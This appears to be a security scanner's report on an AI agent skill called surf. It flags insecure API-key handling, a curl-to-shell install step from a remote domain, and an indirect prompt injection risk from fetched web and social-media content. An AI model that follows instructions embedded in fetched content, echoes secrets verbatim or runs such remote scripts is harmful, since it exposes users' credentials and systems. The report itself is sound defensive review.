surf

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). The prompt instructs the agent to accept and persist user API keys and shows examples that place secrets directly in commands (e.g., surf auth --api-key sk-xxx and export SURF_API_KEY=<your-api-key>), which requires the LLM to handle and potentially emit secret values verbatim.

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.90). This set includes a direct link to an install.sh script (curl ... | sh) hosted on agent.asksurf.ai — a high‑risk pattern because piping and executing a remote shell from an externally hosted domain can run arbitrary, malicious code even if the API/website endpoints look legitimate.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill explicitly fetches and ingests untrusted public content (e.g., the Domain Guide lists "web" — "Fetch/parse any URL" and "social" — "Twitter/X profiles, posts, followers"), the SKILL.md shows the agent is expected to run those endpoints and read their API responses as part of its workflow, and those responses could therefore contain user-generated instructions that might influence subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 0.90). The skill's setup explicitly instructs running curl -fsSL https://agent.asksurf.ai/cli/releases/install.sh | sh, which downloads and executes remote code as a required install step, so this URL is a runtime external dependency that executes remote code.